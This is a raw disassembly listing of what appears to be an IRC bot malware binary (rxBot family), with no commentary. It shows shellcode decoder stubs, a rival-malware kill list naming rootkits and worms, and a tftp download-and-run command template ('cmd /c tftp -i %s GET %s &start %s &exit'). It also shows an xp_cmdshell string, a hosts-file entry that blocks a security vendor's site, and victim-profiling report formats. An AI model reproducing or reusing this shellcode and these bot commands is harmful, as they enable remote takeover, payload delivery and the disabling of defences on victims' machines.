aBootcfg_exe db 'bootcfg.exe',0 ; DATA XREF: .text:0043F088�o
aBlastcln_exe db 'blastcln.exe',0 ; DATA XREF: .text:0043F084�o
align 4
aAutolfn_exe db 'autolfn.exe',0 ; DATA XREF: .text:0043F080�o
aAutofmt_exe db 'autofmt.exe',0 ; DATA XREF: .text:0043F07C�o
aAutoconv_exe db 'autoconv.exe',0 ; DATA XREF: .text:0043F078�o
align 4
aAutochk_exe db 'autochk.exe',0 ; DATA XREF: .text:0043F074�o
aAuditusr_exe db 'auditusr.exe',0 ; DATA XREF: .text:0043F070�o
align 4
aAttrib_exe db 'attrib.exe',0 ; DATA XREF: .text:0043F06C�o
align 4
aAtmadm_exe db 'atmadm.exe',0 ; DATA XREF: .text:0043F068�o
align 10h
aAti2mdxx_exe db 'Ati2mdxx.exe',0 ; DATA XREF: .text:0043F064�o
align 10h
aAti2evxx_exe db 'ati2evxx.exe',0 ; DATA XREF: .text:0043F060�o
; .text:0043F5A8�o
align 10h
aAt_exe db 'at.exe',0 ; DATA XREF: .text:0043F05C�o
align 4
aAsr_pfu_exe db 'asr_pfu.exe',0 ; DATA XREF: .text:0043F058�o
aAsr_ldm_exe db 'asr_ldm.exe',0 ; DATA XREF: .text:0043F054�o
aAsr_fmt_exe db 'asr_fmt.exe',0 ; DATA XREF: .text:0043F050�o
aArp_exe db 'arp.exe',0 ; DATA XREF: .text:0043F04C�o
aAppend_exe db 'append.exe',0 ; DATA XREF: .text:0043F048�o
align 10h
aAlg_exe db 'alg.exe',0 ; DATA XREF: .text:0043F044�o
aAhui_exe db 'ahui.exe',0 ; DATA XREF: .text:0043F040�o
align 4
aActmovie_exe db 'actmovie.exe',0 ; DATA XREF: .text:0043F03C�o
align 4
aAccwiz_exe db 'accwiz.exe',0 ; DATA XREF: .text:0043F038�o
align 10h
aHdashcut_exe db 'HDAShCut.exe',0 ; DATA XREF: .text:0043F034�o
; .text:0043F650�o
align 10h
aKeystone_exe db 'keystone.exe',0 ; DATA XREF: .text:0043F030�o
align 10h
aNwiz_exe db 'nwiz.exe',0 ; DATA XREF: .text:0043F02C�o
align 4
aNvcplui_exe db 'nvcplui.exe',0 ; DATA XREF: .text:0043F028�o
aNvdspsch_exe db 'nvdspsch.exe',0 ; DATA XREF: .text:0043F024�o
align 4
aNvcolor_exe db 'nvcolor.exe',0 ; DATA XREF: .text:0043F020�o
aNvappbar_exe db 'nvappbar.exe',0 ; DATA XREF: .text:0043F01C�o
align 4
aNvudisp_exe db 'nvudisp.exe',0 ; DATA XREF: .text:0043F018�o
aNvsvc32_exe db 'nvsvc32.exe',0 ; DATA XREF: .text:0043F014�o
aNvuninst_exe db 'NVUNINST.EXE',0 ; DATA XREF: .text:0043F010�o
align 4
aSview_exe db 'sview.exe',0 ; DATA XREF: .text:0043F00C�o
align 4
aNview_exe db 'nview.exe',0 ; DATA XREF: .text:0043F008�o
align 4
aWmsoft_exe db 'wmsoft*.exe',0 ; DATA XREF: .text:0043F004�o
; .text:0043F644�o ...
aHttpWww_fireda db 'http://www.firedaemon.com',0 ; DATA XREF: .text:0043EFF4�o
align 4
aFiredaemon_b db 'FireDaemon.b',0 ; DATA XREF: .text:0043EFF0�o
align 4
aCopyrightC2007 db 'Copyright (c) 2007 FireDaemon Technologies Limited',0
; DATA XREF: .text:0043EFEC�o
align 10h
aFiredaemon_a db 'FireDaemon.a',0 ; DATA XREF: .text:0043EFE8�o
align 10h
aStrncpyWolffdi db 'strncpy(wolffdir, xdccdir, MAX_PATH); strncat(wolffdir, "\wolff",'
; DATA XREF: .text:0043EFE4�o
db ' MAX_PATH)',0
aWolf_kit db 'Wolf.Kit',0 ; DATA XREF: .text:0043EFE0�o
align 4
aDefineHe4_hook db '#define HE4_HOOK_INV_VERSION 0x20001005',0
; DATA XREF: .text:0043EFDC�o
align 4
aHe4hookrootkit db 'He4HookRootkit-v2.15b',0 ; DATA XREF: .text:0043EFD8�o
align 4
aMsdirectx_sys db 'msdirectx.sys',0 ; DATA XREF: .text:0043EFD4�o
align 4
aFu_driver_b db 'FU.Driver.b',0 ; DATA XREF: .text:0043EFD0�o
aRdriv_sys db 'rdriv.sys',0 ; DATA XREF: .text:0043EFCC�o
align 4
aFu_driver_a db 'FU.Driver.a',0 ; DATA XREF: .text:0043EFC8�o
dword_441020 dd 301B3015h, 3054304Ah, 3067305Eh, 30AB3087h, 30C230B1h
; DATA XREF: .text:0043EFC4�o
dd 31C331B7h, 31DB31CFh, 327A31F5h, 338E332Fh, 33A7339Ah
dd 343233AFh, 3442343Ah, 345A344Fh, 34E634B3h, 34F834EFh
dd 350A3501h, 351C3513h, 357E3524h, 366B3589h, 369C3688h
dd 36C336BAh, 36EE36E4h, 37133709h, 377C3775h, 3797378Bh
dd 391A37B1h, 39333924h, 39B13943h, 3A0B3A05h, 3A243A16h
dd 3A453A3Ah, 3A643A55h, 3A783A69h, 3A913A8Bh, 3AAD3A9Eh
dd 3AC23AB9h, 3ADE3AD8h, 0
aFu_rootkit_dri db 'FU.Rootkit.Driver',0 ; DATA XREF: .text:0043EFC0�o
align 4
aStaticCharAc_d db 'static CHAR ac_driverName[] = "msdirectx.sys',0
; DATA XREF: .text:0043EFBC�o
align 4
aFu_rootkit_c db 'FU.Rootkit.c',0 ; DATA XREF: .text:0043EFB8�o
align 4
aConstWcharDevi db 'const WCHAR deviceNameBuffer[] = L"\Device\msdirectx',0
; DATA XREF: .text:0043EFB4�o
align 4
aFu_rootkit_b db 'FU.Rootkit.b',0 ; DATA XREF: .text:0043EFB0�o
align 4
aDefineFile_dev db '#define FILE_DEVICE_ROOTKIT 0x00002a7b',0
; DATA XREF: .text:0043EFAC�o
aFu_rootkit_a db 'FU.Rootkit.a',0 ; DATA XREF: .text:0043EFA8�o
align 10h
aImportMsnMsnme db '#import "MSN/MSNMessengerAPI.tlb" named_guids, no_namespace',0
; DATA XREF: .text:0043EFA4�o
aMsnbot_b db 'MSNBot.b',0 ; DATA XREF: .text:0043EFA0�o
align 4
aStaticConstCha db 'static const char *msg_english[] = {',0 ; DATA XREF: .text:0043EF9C�o
align 10h
aMsnbot_a db 'MSNBot.a',0 ; DATA XREF: .text:0043EF98�o
align 4
aNircomline db 'NirComLine',0 ; DATA XREF: .text:0043EF90�o
; .text:0043EF94�o
align 4
aPipeEpmapper db 'pipe\epmapper\',0 ; DATA XREF: .text:0043EF8C�o
align 4
aDcomOldScan db 'Dcom-Old-Scan',0 ; DATA XREF: .text:0043EF88�o
align 4
aR0lgodlhfaauak db 'R0lGODlhFAAUAKIAAAAAAP//////93d3cDAwIaGhgQEBP//////wAAACH5BAEAAAY'
; DATA XREF: .text:0043EF84�o
db 'ALAAAAAAUABQAAAM8',0
align 4
aC99 db 'c99',0 ; DATA XREF: .text:0043EF80�o
aI2luy2x1zgugph db 'I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZ'
; DATA XREF: .text:0043EF7C�o
db 'SA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZG'
db 'UgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJ'
db 'nYyxhcmd2KQ0KaW50I',0
align 4
aR57 db 'r57',0 ; DATA XREF: .text:0043EF78�o
aHiderunHiddenA db 'HideRun -- hidden application launcher.',0 ; DATA XREF: .text:0043EF74�o
aHiderun db 'HideRun',0 ; DATA XREF: .text:0043EF70�o
aSoftwareAdrian db 'Software\Adrian Lopez\HideWindow\Preferences HideWindow',0
; DATA XREF: .text:0043EF6C�o
aHiderGui db 'Hider-Gui',0 ; DATA XREF: .text:0043EF68�o
align 10h
aSoftwareMicr_4 db 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones'
; DATA XREF: .text:0043EF64�o
db '\3',0
aLowerzones db 'LowerZones',0 ; DATA XREF: .text:0043EF60�o
align 10h
aWindowsupdate_ db 'windowsupdate.com',0 ; DATA XREF: .text:0043EF5C�o
align 4
aMsblast db 'MsBlast',0 ; DATA XREF: .text:0043EF58�o
dword_44144C dd 0FFFFFF43h, 1303030h, 282B1F0Ah, 132A12Bh, 0aBeagle db 'Beagle',0 ; DATA XREF: .text:0043EF50�o
align 4
aDonateToTheHur db 'Donate to the Hurricane Katrina relief effort.',0
; DATA XREF: .text:0043EF4C�o
align 4
aBobic_b db 'Bobic.B',0 ; DATA XREF: .text:0043EF48�o
aOsamaBinLadenC db 'Osama Bin Laden Captured.',0 ; DATA XREF: .text:0043EF44�o
align 4
aBobic_a db 'Bobic.A',0 ; DATA XREF: .text:0043EF40�o
unk_4414C4 db 6Fh ; o ; DATA XREF: .text:0043EF3C�o
db 3, 50h, 73h
aGetcurrentproc db 'GetCurrentProcessI',0
align 4
aTaskhider db 'TaskHider',0 ; DATA XREF: .text:0043EF38�o
align 4
loc_4414E8: ; DATA XREF: .text:0043EF34�o
jmp short loc_4414F9
; ---------------------------------------------------------------------------
loc_4414EA: ; CODE XREF: .text:loc_4414F9�p
pop ebx
xor ecx, ecx
sub cx, 0FFEEh
loc_4414F1: ; CODE XREF: .text:004414F5�j
xor byte ptr [ebx], 55h
inc ebx
loop loc_4414F1
jmp short near ptr word_4414FE
; ---------------------------------------------------------------------------
loc_4414F9: ; CODE XREF: .text:loc_4414E8�j
call loc_4414EA
; ---------------------------------------------------------------------------
word_4414FE dw 0 ; CODE XREF: .text:004414F7�j
dword_441500 dd 69614D49h, 68532E6Ch, 6C6C65hdword_44150C dd 0D959506Ah, 2474D9EEh, 73815BF4h, 6F8C0F13h, 0
; DATA XREF: .text:0043EF2C�o
dword_441520 dd 77537049h, 68637469h, 6568532Eh, 6C6Ch; ---------------------------------------------------------------------------
loc_441530: ; DATA XREF: .text:0043EF24�o
jmp short near ptr word_4415A2
; ---------------------------------------------------------------------------
dw 3356h
dd 408B64C0h, 78C08530h, 0C408B0Ch, 0
dword_441544 dd 4474654Eh, 532E4544h, 6C6C6568h, 0; ---------------------------------------------------------------------------
loc_441554: ; DATA XREF: .text:0043EF1C�o
jmp short near ptr word_441566
; ---------------------------------------------------------------------------
dw 4B5Bh
; ---------------------------------------------------------------------------
xor ecx, ecx
mov cx, 125h
loc_44155E: ; CODE XREF: .text:00441562�j
xor byte ptr [ebx+ecx], 99h
loop loc_44155E
; ---------------------------------------------------------------------------
db 2 dup(0)
word_441566 dw 0 ; CODE XREF: .text:loc_441554�j
dword_441568 dd 68637653h, 2E74736Fh, 6C656853h, 6Chdword_441578 dd 8166C933h, 0D9FFB0E9h, 2474D9EEh, 73815BF4h, 0
; DATA XREF: .text:0043EF14�o
dword_44158C dd 63626954h, 68532E6Fh, 6C6C65h; ---------------------------------------------------------------------------
loc_441598: ; DATA XREF: .text:0043EF0C�o
jmp short loc_4415B3
; ---------------------------------------------------------------------------
dw 315Eh
dd 89E981C9h
db 0FFh, 0
word_4415A2 dw 0 ; CODE XREF: .text:loc_441530�j
aOld4444shell db 'Old4444Shell',0 ; DATA XREF: .text:0043EF08�o
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_4415B3: ; CODE XREF: .text:loc_441598�j
; DATA XREF: .text:0043EF04�o
add [ebx+46h], dl
push esp
loc_4415B7: ; DATA XREF: .text:0043EF00�o
xor ds:53006925h, dh
jnz short loc_441621
aaa
; ---------------------------------------------------------------------------
dd 0
a022moptestmv1_ db '022OPtestv1.1',0Dh,0Ah,0 ; DATA XREF: .text:0043EEFC�o
align 4
aOptix db 'Optix',0 ; DATA XREF: .text:0043EEF8�o
align 10h
aPleaz_runS db 'pleaz_run%s',0 ; DATA XREF: .text:0043EEF4�o
aNetdevil db 'NetDevil',0 ; DATA XREF: .text:0043EEF0�o
align 4
aSystemrootSyst db '%systemroot%\system32\cmd.exe',0 ; DATA XREF: .text:0043EEEC�o
align 4
aVncscan db 'VNCScan',0 ; DATA XREF: .text:0043EEE8�o
byte_441620 db 80h ; DATA XREF: .text:0043EEE4�o
; ---------------------------------------------------------------------------
loc_441621: ; CODE XREF: .text:004415BD�j
bound eax, [ecx]
add bh, [ebp+1000100h]
add [esi], dl
; ---------------------------------------------------------------------------
db 8Fh
dd 182h
aIis5ssl db 'IIS5SSL',0 ; DATA XREF: .text:0043EEE0�o
aMain_0 db '[MAIN]: ',0 ; DATA XREF: .text:0043EEDC�o
align 4
aRxMain db 'Rx Main',0 ; DATA XREF: .text:0043EED8�o
; ---------------------------------------------------------------------------
loc_44164C: ; DATA XREF: .text:0043EED4�o
mov edi, ecx
xor al, al
inc al
repne scasb
jmp edi
; ---------------------------------------------------------------------------
align 4
aWebdav db 'WebDav',0 ; DATA XREF: .text:0043EED0�o
align 10h
; aExecMaster(long long, *)
aExecMaster__xp db 'EXEC master..xp_cmdshell',0 ; DATA XREF: .text:0043EECC�o
align 4
aMssql_b db 'MSSQL.B',0 ; DATA XREF: .text:0043EEC8�o
aThcthcthcthcth db 'THCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHC',0
; DATA XREF: .text:0043EEC4�o
align 4
aMssql_a db 'MSSQL.A',0 ; DATA XREF: .text:0043EEC0�o
a8d9f4e40A03d11 db '8d9f4e40-a03d-11ce-8f69-08003e30051b',0 ; DATA XREF: .text:0043EEBC�o
align 4
aPnp_b db 'PNP.b',0 ; DATA XREF: .text:0043EEB8�o
align 10h
dword_4416F0 dd 0E983C929h, 0D9EED9B0h, 5BF42474h, 19137381h, 0
; DATA XREF: .text:0043EEB4�o
dword_441704 dd 2E504E50h, 61hdword_44170C dd 41435302h, 3A3A204Eh, 220hdword_441718 dd 43207852h, 726F6C6Fh, 6E616353h, 622Eha127_0_0_1Www_s db 0Ah ; DATA XREF: .text:0043EEA4�o
db '127.0.0.1',9,'www.symantec.com',0Ah,0
align 4
aChangehosts db 'ChangeHosts',0 ; DATA XREF: .text:0043EEA0�o
dword_441754 dd 57501C43h, 5AD1FF56h, 8430358h, 8B52F88Bh, 0dword_441768 dd 6C6C6548h, 2E746F62h, 62hdword_441774 dd 6C6C6548h, 2E746F62h, 61haRpcpatch_mutex db 'RpcPatch_Mutex',0 ; DATA XREF: .text:0043EE8C�o
align 10h
aWelchia_a db 'Welchia.a',0 ; DATA XREF: .text:0043EE88�o
align 4
aAddexExinfo db 'AddEx(exinfo)',0 ; DATA XREF: .text:0043EE84�o
align 4
aZotobForbotMod db 'Zotob/ForBot Mods',0 ; DATA XREF: .text:0043EE80�o
align 10h
dword_4417C0 dd 0DDCA6D6Ah, 8090F0E4h, 4A22Fh ; .text:0043EE94�o
aBlaster db 'Blaster',0 ; DATA XREF: .text:0043EE78�o
align 8
aFbsgjnerZvpe_0 db 'Fbsgjner\Zvpebfbsg\Jvaqbjf\PheeragIrefvba\Rkcybere\PbzQyt32\Irefv'
; DATA XREF: .text:0043EE74�o
db 'ba',0
aMydoom_c db 'MyDoom.C',0 ; DATA XREF: .text:0043EE70�o
align 4
aFbsgjnerZvpebf db 'Fbsgjner\Zvpebfbsg\JNO\JNO4\Jno Svyr Anzr',0
; DATA XREF: .text:0043EE6C�o
align 4
aMydoom_b db 'MyDoom.B',0 ; DATA XREF: .text:0043EE68�o
align 10h
dword_441860 dd 9E3C1385h, 0A2hdword_441868 dd 6F44794Dh, 412E6D6Fh, 2 dup(0)aSendingYouPack db '** Sending you pack #%i ("%s"), which is %sB (resume supported)',0
; DATA XREF: .text:0043EE5C�o
aIrofferAll db 'Iroffer-All',0 ; DATA XREF: .text:0043EE58�o
aTotalOffered1_ db 'Total Offered: %1.1f MB Total Transferred: %1.2f %cB',0
; DATA XREF: .text:0043EE54�o
align 4
aIroffer_b db 'Iroffer.b',0 ; DATA XREF: .text:0043EE50�o
align 4
aHttpIroffer_or db 'http://iroffer.org/',0 ; DATA XREF: .text:0043EE4C�o
aIroffer_a db 'Iroffer.a',0 ; DATA XREF: .text:0043EE48�o
align 4
aRoot_start db 'root.start',0 ; DATA XREF: .text:0043EE44�o
align 4
aOtherbot_b db 'Otherbot.b',0 ; DATA XREF: .text:0043EE40�o
align 10h
aScan_start db 'scan.start',0 ; DATA XREF: .text:0043EE3C�o
align 4
aOtherbot_a db 'Otherbot.a',0 ; DATA XREF: .text:0043EE38�o
align 4
aRpc_c db 'RPC.c:',0 ; DATA XREF: .text:0043EE34�o
align 10h
aLinkbot_rpc db 'Linkbot.RPC',0 ; DATA XREF: .text:0043EE30�o
aDcom2 db 'dcom2:',0 ; DATA XREF: .text:0043EE2C�o
align 4
aLinkbot_dcom_c db 'Linkbot.dcom.c',0 ; DATA XREF: .text:0043EE28�o
align 4
aDcom2_c db 'dcom2.c:',0 ; DATA XREF: .text:0043EE24�o
align 10h
aLinkbot_dcom_b db 'Linkbot.dcom.b',0 ; DATA XREF: .text:0043EE20�o
align 10h
dword_4419A0 dd 234032Dh, 6D6F6364h, 2632E32h, 2D03hdword_4419B0 dd 6B6E694Ch, 2E746F62h, 6D6F6364h, 612Ehdword_4419C0 dd 63737069h, 2A206E61h, 2A2E2A2Eh, 2A2Ehdword_4419D0 dd 6B6E694Ch, 2D746F62h, 6E616353h, 612Ehdword_4419E0 dd 4D9F4AB8h, 8611CF1Ch, 1EhaRmact db 'RMACT',0 ; DATA XREF: .text:0043EE08�o
align 4
aWeBackLooooooo db 'We BaCk LoooooooooooOOOOOOOOOOOOOooo',0 ; DATA XREF: .text:0043EE04�o
align 4
aQ8 db 'Q8',0 ; DATA XREF: .text:0043EE00�o
align 10h
dword_441A20 dd 0F254C481h, 0E8FCFFFFh, 46hoff_441A2C dd offset byte_4E5341 ; DATA XREF: .text:0043EDF8�o
dword_441A30 dd 0D959516Ah, 2474D9EEh, 0F4haNetapi4444bind db 'Netapi4444Bind',0 ; DATA XREF: .text:0043EDF0�o
align 4
a3GsUT db '3Ƀt',0 ; DATA XREF: .text:0043EDEC�o
align 4
off_441A58 dd offset byte_4D5953 ; DATA XREF: .text:0043EDE8�o
dword_441A5C dd 0E983C933h, 0D9EED9AFh, 74haC101 db 'C101',0 ; DATA XREF: .text:0043EDE0�o
align 10h
loc_441A70: ; DATA XREF: .text:0043EDDC�o
jmp short loc_441A74
; ---------------------------------------------------------------------------
loc_441A72: ; CODE XREF: .text:loc_441A74�p
jmp short near ptr byte_441A79
; ---------------------------------------------------------------------------
loc_441A74: ; CODE XREF: .text:loc_441A70�j
call loc_441A72
; ---------------------------------------------------------------------------
byte_441A79 db 3 dup(0) ; CODE XREF: .text:loc_441A72�j
dword_441A7C dd 412E5450h, 0 dword_441A84 dd 4143535Bh, 203A5D4Eh, 0dword_441A90 dd 53207852h, 6E6163hdword_441A98 dd 0D959506Ah, 2474D9EEh, 0F4hdword_441AA4 dd 5D42525Bh, 53746F42h, 6C6C6568h, 0dword_441AB4 dd 34D9E1D9h, 58585824h, 58hdword_441AC0 dd 6F626159h, 612E74h; ---------------------------------------------------------------------------
loc_441AC8: ; DATA XREF: .text:0043EDBC�o
jmp short near ptr aTftp_0+6
; ---------------------------------------------------------------------------
dw 758Bh
dd 35748B3Ch, 78h
dword_441AD4 dd 47323357h, 53206E65h, 43haCmdCTftpISGetS db 'cmd /c tftp -i %s GET %s &start %s &exit',0 ; DATA XREF: .text:0043EDB4�o
align 4
aTftpget_b db 'TFTPGet.b',0 ; DATA XREF: .text:0043EDB0�o
align 4
aTftp_0 db '[TFTP]',0 ; CODE XREF: .text:loc_441AC8�j
; DATA XREF: .text:0043EDAC�o
align 10h
aRxTftp db 'Rx TFTP',0 ; DATA XREF: .text:0043EDA8�o
aTftpISGetSS db 'tftp -i %s get %s &%s',0Ah,0 ; DATA XREF: .text:0043EDA4�o
align 10h
aTftpget_a db 'TFTPGet.a',0 ; DATA XREF: .text:0043EDA0�o
align 4
a220BotServerWi db '220 Bot Server (Win32)',0Dh,0Ah,0 ; DATA XREF: .text:0043ED9C�o
align 4
aPhatbot db 'PhatBot',0 ; DATA XREF: .text:0043ED98�o
a220WelcomeToBo db '220 "Welcome to Bot FTP service."',0Dh,0Ah,0
; DATA XREF: .text:0043ED94�o
aAgobot db 'AgoBot',0 ; DATA XREF: .text:0043ED90�o
align 4
aStnyftpd0wnsJ0 db 'StnyFtpd 0wns j00',0 ; DATA XREF: .text:0043ED8C�o
align 10h
aStnyftpd db 'StnyFtpd',0 ; DATA XREF: .text:0043ED88�o
align 4
aReptileWelcome db 'Reptile welcomes you...',0 ; DATA XREF: .text:0043ED84�o
aRepFtpd db 'Rep FTPd',0 ; DATA XREF: .text:0043ED80�o
align 10h
loc_441BE0: ; DATA XREF: .text:0043ED7C�o
jmp short near ptr word_441BF2
; ---------------------------------------------------------------------------
dw 4B5Bh
dd 0B966C933h, 25h
dword_441BEC dd 4C205852h db 53h, 0
word_441BF2 dw 0 ; CODE XREF: .text:loc_441BE0�j
dword_441BF4 dd 5054465Bh, 203A5Dhdword_441BFC dd 46207852h, 7074h; ---------------------------------------------------------------------------
loc_441C04: ; DATA XREF: .text:0043ED6C�o
jmp short loc_441C16
; ---------------------------------------------------------------------------
dw 4A5Ah
dd 0B966C933h, 7Dh
dword_441C10 dd 20706552h ; ---------------------------------------------------------------------------
push ebx
inc ebx
loc_441C16: ; CODE XREF: .text:loc_441C04�j
xor al, [eax]
loc_441C18: ; DATA XREF: .text:0043ED64�o
jmp short near ptr word_441C2A
; ---------------------------------------------------------------------------
dw 4A5Ah
dd 0B966C933h, 66h
dword_441C24 dd 53205852h db 43h, 32h
word_441C2A dw 0 ; CODE XREF: .text:loc_441C18�j
dword_441C2C dd 364C033h, 0C783040h, 8Bhdword_441C38 dd 53205852h, 3143hdword_441C40 dd 43524902h, 203A3A20h, 2dword_441C4C dd 43207852h, 726F6C6Fh, 2E435249h, 62hdword_441C5C dd 49414D02h, 3A3A204Eh, 220hdword_441C68 dd 43207852h, 726F6C6Fh, 622Ehdword_441C74 dd 63533A3Ah, 3A3A6E61h, 0dword_441C80 dd 43207852h, 726F6C6Fh, 6E616353h, 0dword_441C90 dd 614D3A3Ah, 3A3A6E69h, 0dword_441C9C dd 43207852h, 726F6C6Fh, 0dword_441CA8 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: .text:0043ED34�o
dd 2BBBB02h, 73552020h, 7265h
dword_441CC8 dd 5A4E7852h, 632E4Dha_n_z_m_Irc_p_l db '.n.z.m. (irc.p.l.g) .. ',0 ; DATA XREF: .text:0043ED2C�o
align 4
aRxnzm_b db 'RxNZM.b',0 ; DATA XREF: .text:0043ED28�o
dword_441CF4 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: .text:0043ED24�o
dd 2BBBB02h, 20h
aRxnzm db 'RxNZM',0 ; DATA XREF: .text:0043ED20�o
align 4
dword_441D18 dd 234032Dh, 6E69616Dh, 202D0302h, 0dword_441D28 dd 4C2D7852h, 2D6B6E69h, 2E414950h, 63hdword_441D38 dd 234032Dh, 6E616373h, 202D0302h, 0dword_441D48 dd 4C2D7852h, 2D6B6E69h, 414950hdword_441D54 dd 5446545Bh, 3A5D4450h, 20hdword_441D60 dd 54207852h, 64505446h, 0dword_441D6C dd 5446545Bh, 203A5D50h, 0dword_441D78 dd 54207852h, 2E505446h, 62hdword_441D84 dd 50544654h, 2F2Fhdword_441D8C dd 53207852h, 6873616Ch, 7446542Dh, 70hdword_441D9C dd 4E414353h, 2F2Fhdword_441DA4 dd 53207852h, 6873616Ch, 6163532Dh, 6Ehdword_441DB4 dd 4E49414Dh, 2F2Fhdword_441DBC dd 53207852h, 6873616Ch, 0dword_441DC8 dd 4F57445Bh, 414F4C4Eh, 203A5D44h, 0dword_441DD8 dd 44207852h, 6C6E776Fh, 64616Fhdword_441DE4 dd 5054465Bh, 203A5D44h, 0dword_441DF0 dd 46207852h, 447074hdword_441DF8 dd 59454B5Bh, 5D474F4Ch, 203Ahdword_441E04 dd 4B207852h, 6F4C7965h, 67hdword_441E10 dd 234032Dh, 2637269h, 2D03haPiabot db 'PiABot',0 ; DATA XREF: .text:0043ECC8�o
align 4
aIrc db 'IRC//',0 ; DATA XREF: .text:0043ECC4�o
align 4
aRxIrc_c db 'Rx IRC.c',0 ; DATA XREF: .text:0043ECC0�o
align 4
aIrc_0 db '[IRC]: ',0 ; DATA XREF: .text:off_43ECBC�o
aRxIrc db 'Rx IRC',0 ; DATA XREF: .text:0043ECB8�o
align 4
aSFoundStringSI db '%s Found string "%s" in "%s" File "%s"',0Ah ; DATA XREF: sub_417823+D1�o
db 0Ah,0
align 4
aSTerminatedAnd db '%s Terminated and deleted %s',0Ah,0 ; DATA XREF: sub_417989+BD�o
align 4
aSRunningAvscan db '%s Running AVScan on %s',0Ah,0 ; DATA XREF: sub_417A90+18D�o
align 10h
aSProcsFinished db '%s Procs Finished: "%s", Total Running Time: %s.',0
; DATA XREF: sub_417CD7+2F0�o
align 4
aSCreatedProcSP db '%s Created proc: "%s", PID: <%d>',0 ; DATA XREF: sub_417CD7+1DB�o
; sub_417CD7+205�o
align 4
aSFailedToCre_0 db '%s Failed to create proc: "%s",error: <%d>',0
; DATA XREF: sub_417CD7+167�o
; sub_417CD7+191�o
align 4
aSCouldnTPars_0 db '%s Couldn',27h,'t parse path,error: <%d>',0 ; DATA XREF: sub_417CD7+A5�o
; sub_417CD7+CC�o
align 4
aSPidIKilledAnd db '%s PID "%i" killed and deleted',0 ; DATA XREF: sub_418010+41C�o
align 4
aSFailedToKillA db '%s Failed to kill and erase proc',0 ; DATA XREF: sub_418010+3B3�o
align 4
aSFailedToKillP db '%s Failed to kill proc',0 ; DATA XREF: sub_418010:loc_4182EB�o
align 4
aSPidIKilled db '%s PID "%i" killed',0 ; DATA XREF: sub_418010+275�o
align 4
aSProSKilledTot db '%s Pro "%s" killed,total: <%s>',0 ; DATA XREF: sub_418010+214�o
align 4
aSUnableToListP db '%s Unable to list procs,error: <%d>',0 ; DATA XREF: sub_418010+19C�o
; sub_418010+1BC�o
aSEndOfList db '%s End of list',0 ; DATA XREF: sub_418010+166�o
align 4
a6d10sS db ' %-6d- %-10s- "%s"',0 ; DATA XREF: sub_418010+119�o
align 10h
aK db ' K',0 ; DATA XREF: sub_418010+FD�o
align 4
aPidAMemoryUsag db ' PID - Memory Usage - Process',0 ; DATA XREF: sub_418010+AB�o
aSProcsList db '%s Procs List:',0 ; DATA XREF: sub_418010+8D�o
align 4
aSS_3 db '%s / %s',0Ah,0 ; DATA XREF: sub_418436+171�o
align 10h
aErrorD db 'Error: <%d>',0 ; DATA XREF: sub_418436+118�o
aUnknown db 'unknown',0 ; DATA XREF: sub_418614+E0�o
; sub_41F6B4+3B�o
aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_418614+5C�o
; sub_418812+4E�o
align 4
a??? db '???',0 ; DATA XREF: sub_418930+4A�o
; sub_418B58+17�o
aDDayS0_2d0_2d db '%d day(s) %0.2d:%0.2d',0 ; DATA XREF: sub_418A1B+73�o
align 4
a0_2d0_2d db '%0.2d:%0.2d',0 ; DATA XREF: sub_418A1B+60�o
aSCpuI64umhzRam db '%s (CPU): %I64uMHz, (RAM): %sKB total, %sKB free, (O/S): Windows '
; DATA XREF: sub_418B58+2FB�o
db '%s [Version %d.%d - %d], (SysDir): %s. (PC Name): %s, (Current Us'
db 'er): %s, (Date): %s, (Time): %s, (UpTime): %s, (FreeSpace): %I64u'
db 'GB/%I64uGB.',0
align 10h
aHhMmSs db 'HH:mm:ss',0 ; DATA XREF: sub_418B58+180�o
align 4
aDdMmmYyyy db 'dd:MMM:yyyy',0 ; DATA XREF: sub_418B58+164�o
aVista_0 db 'ViSTA',0 ; DATA XREF: sub_418B58+DD�o
align 10h
aBandwidthDownl db '(Bandwidth): Downloaded: %s, Uploaded: %s.',0
; DATA XREF: sub_418F30+1B3�o
align 4
aCountryS_ db '(Country): %s. ',0 ; DATA XREF: sub_418F30+183�o
align 10h
aSConnectionSIn db '%s (Connection): %s, (IntIP): %s, (ExtIP): %s, (HostName): %s, (P'
; DATA XREF: sub_418F30+164�o
db 'rivate): %s. ',0
align 10h
aNo db 'No',0 ; DATA XREF: sub_418F30+144�o
align 4
aYes db 'Yes',0 ; DATA XREF: sub_418F30+13D�o
aSkb db '%sKB',0 ; DATA XREF: sub_418F30+108�o
align 10h
aSgb db '%sGB',0 ; DATA XREF: sub_418F30+EA�o
align 4
aSmb db '%sMB',0 ; DATA XREF: sub_418F30+C7�o
align 10h
off_442260 dd offset loc_412F4C+2 ; DATA XREF: sub_418F30:loc_418FA9�o
off_442264 dd offset dword_4E414C ; DATA XREF: sub_418F30:loc_418FA2�o
dword_442268 dd 6C616944h, 412F7075h, 4C5344hdword_442274 dd 20746F4Eh, 6E6E6F63h, 65746365h, 64hdword_442284 dd 69626F4Dh, 5020656Ch, 656E6F68h, 0dword_442294 dd 626F6D2Eh, 69haWirelessAccess db 'WireLess Access Point',0 ; DATA XREF: sub_41912B+7C2�o
align 4
a_wap db '.wap',0 ; DATA XREF: sub_41912B:loc_4198DC�o
align 4
aSouthAfrica db 'South Africa',0 ; DATA XREF: sub_41912B+7AA�o
align 4
off_4422CC dd offset word_617A2E ; DATA XREF: sub_41912B:loc_4198C4�o
dword_4422D0 dd 73752Eh aUkraine db 'Ukraine',0 ; DATA XREF: sub_41912B+77A�o
off_4422DC dd offset word_61752E ; DATA XREF: sub_41912B:loc_419894�o
aTaiwan db 'Taiwan',0 ; DATA XREF: sub_41912B+762�o
align 4
a_tw db '.tw',0 ; DATA XREF: sub_41912B:loc_41987C�o
aTurkey db 'Turkey',0 ; DATA XREF: sub_41912B+747�o
align 4
